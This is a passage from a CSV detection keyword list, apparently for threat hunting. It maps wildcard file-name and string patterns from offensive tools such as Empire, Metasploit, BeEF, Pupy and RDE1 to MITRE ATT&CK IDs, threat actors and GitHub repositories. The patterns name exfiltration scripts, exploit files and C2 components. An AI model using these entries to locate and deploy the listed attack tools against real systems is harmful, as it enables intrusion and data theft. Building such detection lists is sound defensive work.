","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExfilDataToGitHub.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1140","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exfil-EC266392-D6BC-4F7B-A4D1-410166D30B55.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*exfiltrate_via_post.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - 
TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*Exfiltration from DNS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*Exfiltration from HTTPS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*Exfiltration.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*existing_auto_target.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exit_nimbo*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*--expected Bad --expected-stop Welcome*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"*expl-bin*","offensive_tool_keyword","expl-bin","some of my modified exploits and some scripts.","T1210.001 - T1201 - T1059","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/sailay1996/expl-bin","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*explib2_ie11_exec_test_case.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*exploit*wordpress_add_admin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*exploit.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.bat*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.bin*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.c*","offensive_tool_keyword","POC","CVE POCs 
exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.com*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.exe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.msi*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.pl*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.ps1*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.py*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" 
+"*exploit.reg*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.run*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.sh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.vb*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.vbe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.vbs*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.vbscript*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*exploit.zsh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z"
+"*Exploit:Python/CVE*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*exploit_frameworks.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z"
+"*exploit_fuse.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z"
+"*exploit_kctf.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z"
+"*exploit_oneline.md*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z"
+"*exploit_suggester *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. 
Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*exploit_suggester.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*exploit_suggester.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*Exploitation Toolkit*","offensive_tool_keyword","PRT","PRET is a new tool for printer security testing developed in the scope of a Masters Thesis at Ruhr University Bochum. 
It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript. PJL and PCL are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs. accessing the printers file system and memory or even causing physical damage to the device. All attacks are documented in detail in the Hacking Printers Wiki. The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus. after entering a UNIX-like command. PRET translates it to PostScript. PJL or PCL. sends it to the printer. evaluates the result and translates it back to a user-friendly format. PRET offers a whole bunch of commands useful for printer attacks and fuzzing","T1210.001 - T1027.002 - T1003 - T1505 - T1564.001","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RUB-NDS/PRT","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*exploit-database-bin-sploits/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*Exploit-JBoss -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Exploit-Jenkins*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-Jenkins.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Exploit-Jenkins.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Exploit-JMXConsole*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*exploits*_csrf/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*exploits*_csrf/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*exploits/*_macro*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*exploits/CVE-*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
